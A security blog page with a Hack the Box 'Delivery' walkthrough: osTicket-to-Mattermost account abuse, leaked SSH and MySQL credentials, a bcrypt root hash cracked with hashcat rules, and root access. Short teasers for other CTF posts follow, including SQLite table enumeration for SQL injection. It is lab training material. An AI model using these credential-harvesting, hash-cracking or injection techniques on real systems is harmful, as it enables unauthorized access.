Hack the Box – Delivery

Delivery was an easy-rated Linux box by ippsec. Despite being an easy box, it had a clever path to user that relies on abusing business processes rather than software, and it tries to teach something about hashcat rules for the escalation to root.

Initial Enumeration

An initial nmap scan showed ports 22, 80 and 8065 open:

root@kali-e:/home/jmpalk/htb/delivery# nmap -v -n -Pn 10.10.10.222 -p1-65535
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 15:25 EDT
Initiating SYN Stealth Scan at 15:25
Scanning 10.10.10.222 [65535 ports]
Discovered open port 80/tcp on 10.10.10.222
Discovered open port 22/tcp on 10.10.10.222
Discovered open port 8065/tcp on 10.10.10.222
Completed SYN Stealth Scan at 15:25, 13.52s elapsed (65535 total ports)
Nmap scan report for 10.10.10.222
Host is up (0.023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
           Raw packets sent: 65591 (2.886MB) | Rcvd: 65535 (2.621MB)
root@kali-e:/home/jmpalk/htb/delivery# 

Port 80 is the splash page for the delivery service. There’s not a lot there beyond the contact-us blurb, which points toward the Help Desk at helpdesk.delivery.htb and the Mattermost server, which is the service running on port 8065.

The "contact us" block on delivery.htb, reading "For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server."
This is critical information.

Going to the helpdesk page, you can submit tickets via the osticket ticketing system, even without having an account.

The osticket-based help desk system
You can submit a ticket via osticket.

The MatterMost server requires you to have an @delivery.htb address in order to be able to register.

The Mattermost chat system signin page
Access to MatterMost requires an @delivery.htb email address

Initial foothold

The Contact Us dialog on the landing page gives the key to getting into the box. I need a ‘@delivery.htb’ address to access MatterMost. But how to get that email address? The Help Desk will give me one.

I started by creating a ticket. The content of the ticket doesn’t matter.

Image of a ticket being submitted to the delivery.htb osticket instance
What I put in the ticket isn’t as important as what osticket puts in the ticket.

The key bit is what happens once I submit the ticket.

A ticket creation confirmation, including a note "if you want to add more information to your ticket, just email to 5213117@delivery.htb"
Thank you, osticket, for creating an @delivery.htb email address

Osticket creates an email address – 5213117@delivery.htb – that I can send updates to. Taking that address over to Mattermost, I can use it to create an account.

Creating a Mattermost account with the osticket-supplied email address.
Creating a Mattermost account with the osticket email address

Once I create the account, Mattermost informs me I need to visit an account validation link it sent to my email address. Osticket helpfully receives the email and displays it to me when I check the status on my ticket.

The Mattermost account validation email as an update to my helpdesk ticket
Thanks for taking messages for me, osticket!

I copy the link into my browser, hit enter, and my Mattermost account is validated and ready to go.

Mattermost showing that my account email address has been verified.
Ready to log into my new Mattermost account

Logging into Mattermost and joining the System team immediately provides some interesting information.

A Mattermost conversation showing themaildeliverer account password as "Youve_G0t_Mail!", and a warning not to use passwords with a variant of "PleaseSubscribe" as they're vulnerable to bruteforce attacks with hashcat rules.
Credentials for the box, and additional password guidance

The credentials for the box get me right in, and user.txt is right there.

jmpalk@kali-e:~/htb/delivery$ ssh maildeliverer@delivery.htb
The authenticity of host 'delivery.htb (10.10.10.222)' can't be established.
ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts.
Enter passphrase for key '/home/jmpalk/.ssh/id_rsa': 
maildeliverer@delivery.htb's password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jan  5 06:09:50 2021 from 10.10.14.5
maildeliverer@Delivery:~$ 

Root

From the Mattermost comment, I have a good idea of what the password is going to look like, and that I’m going to need a hash to crack. This cuts my enumeration down substantially. I’m looking for notes, scripts and config files that might have passwords. Looking around the filesystem, I find the Mattermost config file at /opt/mattermost/config/config.json. It’s got a pretty big hint right in it.


"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    },

Using the provided username and password to log into MySQL, I query the user table.

Results of 'SELECT Username, Password FROM mattermost.Users', including a root user and hash.
Hey – look! A root user with password hash!

There’s a root hash in there. Feeding it into HashID, it comes back as blowfish, which is type 3200 in hashcat. The Mattermost note was warning people against using passwords vulnerable to hashcat rules. Hashcat rules allow one to programmatically modify the passwords being guessed, doing things like generating all the leetspeak variations of words in a dictionary. You can come up with your own rules, but in this case I used ‘best64’, one of the pre-written rule sets hashcat ships with.
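To show why the Mattermost warning was right, here is an added example (my own code, not hashcat's and not part of the original walkthrough): a small interpreter for a subset of hashcat's rule syntax, used as a password-policy check that rejects any candidate a cheap rule can derive from a banned base word such as "PleaseSubscribe". The rule list is constructed in best64's syntax and is not the real best64.rule file.

```python
# Rule functions that take no argument.
SIMPLE = {
    ":": lambda w: w,                              # no-op
    "l": str.lower,                                # lowercase all
    "u": str.upper,                                # uppercase all
    "c": lambda w: w[:1].upper() + w[1:].lower(),  # capitalize
    "t": str.swapcase,                             # toggle case
    "r": lambda w: w[::-1],                        # reverse
    "d": lambda w: w + w,                          # duplicate
    "f": lambda w: w + w[::-1],                    # reflect
    "]": lambda w: w[:-1],                         # delete last char
    "[": lambda w: w[1:],                          # delete first char
}

def apply_rule(word, rule):
    """Apply one rule line (functions in sequence; spaces are ignored)."""
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        i += 1
        if f == " ":
            continue
        if f in SIMPLE:
            w = SIMPLE[f](w)
        elif f == "$":                             # $X: append X
            w, i = w + rule[i], i + 1
        elif f == "^":                             # ^X: prepend X
            w, i = rule[i] + w, i + 1
        elif f == "s":                             # sXY: replace every X with Y
            w, i = w.replace(rule[i], rule[i + 1]), i + 2
        elif f == "@":                             # @X: purge every X
            w, i = w.replace(rule[i], ""), i + 1
        else:
            raise ValueError(f"unsupported rule function {f!r}")
    return w

# Constructed rule list written in best64's syntax; not the real best64.rule.
SAMPLE_RULES = [":", "l", "u", "c", "r", "d", "f", "] ]", "$1", "$!", "$1 $2 $3",
                "$! $2 $1", "so0", "se3", "sa@", "c $1", "c $!"]

def derived_from_banned(candidate, banned_words, rules=SAMPLE_RULES):
    """Return (base, rule) if a rule maps a banned base word to candidate, else None."""
    for base in banned_words:
        for rule in rules:
            if apply_rule(base, rule) == candidate:
                return base, rule
    return None
```

A password that this check flags is effectively one guess away for anyone holding the hash and the base word, which is exactly the situation the hashcat run below exploits.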

PS C:\Program Files (x86)\hashcat-6.0.0> .\hashcat.exe -m 3200 .\delivery_hash.txt .\delivery-wl.txt -r .\rules\best64.rule
hashcat (v6.0.0) starting...

OpenCL API (OpenCL 2.1 AMD-APP (3075.13)) - Platform #1 [Advanced Micro Devices, Inc.]
======================================================================================
* Device #1: Ellesmere, 8128/8192 MB (6745 MB allocatable), 36MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session..........: hashcat
Status...........: Cracked
Hash.Name........: bcrypt $2*$, Blowfish (Unix)
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Thu May 13 11:24:48 2021 (35 secs)
Time.Estimated...: Thu May 13 11:25:23 2021 (0 secs)
Guess.Base.......: File (.\delivery-wl.txt)
Guess.Mod........: Rules (.\rules\best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        1 H/s (6.41ms) @ Accel:1 Loops:4 Thr:8 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1020-1024
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util:  5% Core:1347MHz Mem:2000MHz Bus:16

Started: Thu May 13 11:24:42 2021
Stopped: Thu May 13 11:25:24 2021

It came back with a hit in about 42 seconds: “PleaseSubscribe!21”. Going back to my shell, I su’d to root, and it was done.

maildeliverer@Delivery:/opt/mattermost/config$ su
Password: 
root@Delivery:/opt/mattermost/config# cd
root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt
root@Delivery:~# cat root.txt
bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa
root@Delivery:~# 

Again, a clever little path to user, and doing something I hadn’t done before with hashcat rules. Thanks, ippsec!

-30-

HackTheBox Walkthrough: Writeup

Writeup was a box listed as “easy” on Hackthebox.eu. While it was technically easy, its use of fail2ban had the potential to slow down one’s progress toward user, and getting the root flag required careful enumeration under particular circumstances.


Hack the Box: Querier Walkthrough

Querier was a ‘medium’-rated machine on Hack the Box that required attackers to harvest files from unsecured SMB shares and capture database credentials off the wire to get a toehold on the system, and then carefully enumerate the box to find admin credentials to finally pwn the system.


Shmoocon

So, I went to Shmoocon for the first time this year, and I had a blast. Met some good people and saw a lot of great talks. A few highlights:

  • Stephen Breen of FoxGlove Security showed how to chain together a series of existing Windows vulnerabilities to build a new privilege escalation exploit based on the Windows network broadcast name service (NBNS)
  • Jay Beale of InGuardians gave a great talk on using Docker containers to limit attacks on apps
  • Mandiant’s Matt Dunwoody and Nick Carr provided a postmortem on a massive breach they’d recently had to contain and remediate. Key takeaways: as an incident responder, your operational tempo has to outpace the attacker, and if you’ve got PowerShell in your environment, upgrade to v4 to take advantage of the logging capabilities

The links above point to the Shmoocon schedule; I’ll add links to the slides as they become available.

Update: videos are available here.

Finding tables and columns in Sqlite

At a recent capture-the-flag event, I came across a web app that had a somewhat troublesome SQL injection vulnerability. Identifying that the query was vulnerable was easy enough, but fingerprinting the underlying database was troublesome. No matter what I tried in order to find the version, or even just to identify tables, usernames, etc. using standard MySQL and PostgreSQL queries and tables, I kept getting errors.

Eventually, it occurred to me to try sqlite, which is what it turned out to be. The really frustrating thing was that most of the SQL injection references I found didn’t deal with sqlite, and developer tips for finding database metadata focused on using commands in the sqlite command-line tool rather than SQL queries. Eventually I found a post on stackoverflow that gave me the SQL I needed to find the data I was looking for.

Finding the sqlite version:

SELECT sqlite_version();

Finding tables and columns:

SELECT name FROM sqlite_master WHERE type = 'table';
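As an added example (my own code, not from the original post), the same schema enumeration done entirely with SQL queries that an application can run, including the column listing the CLI's .schema command normally provides; it uses Python's bundled sqlite3 module on a constructed in-memory database that stands in for the CTF app's real one.

```python
import sqlite3

def sqlite_version(conn):
    return conn.execute("SELECT sqlite_version()").fetchone()[0]

def list_tables(conn):
    """User tables from the sqlite_master catalog (skips SQLite's own sqlite_* tables)."""
    rows = conn.execute("SELECT name FROM sqlite_master "
                        "WHERE type = 'table' AND name NOT LIKE 'sqlite_%' ORDER BY name")
    return [r[0] for r in rows]

def list_columns(conn, table):
    """(column, declared type) pairs via pragma_table_info(), the table-valued form of
    PRAGMA table_info that can be used inside an ordinary SELECT (SQLite >= 3.16)."""
    rows = conn.execute("SELECT name, type FROM pragma_table_info(?)", (table,))
    return [(r[0], r[1]) for r in rows]

def create_sql(conn, table):
    """Fallback that works on any SQLite version: the stored CREATE statement
    already names every column."""
    row = conn.execute("SELECT sql FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (table,)).fetchone()
    return row[0] if row else ""

def describe(conn):
    return {t: list_columns(conn, t) for t in list_tables(conn)}

def demo_db():
    """Constructed sample schema standing in for the CTF application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, author INTEGER, body TEXT);
    """)
    return conn

if __name__ == "__main__":
    conn = demo_db()
    print("SQLite", sqlite_version(conn))
    for table, cols in describe(conn).items():
        print(table, cols, "--", create_sql(conn, table))
```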


SANS Holiday Hack Challenge 2015 Solution

SANS had an excellent Holiday Hack challenge this year, full of firmware analysis, web app hacking and exploit development. I’ve been trying these for the past few years, and for the first time, I was able to complete the entire thing. Here’s the PDF of my solution, it’s kind of a rush job. In a couple of days I should have time to pretty it up and make it into a proper post here. Cheers.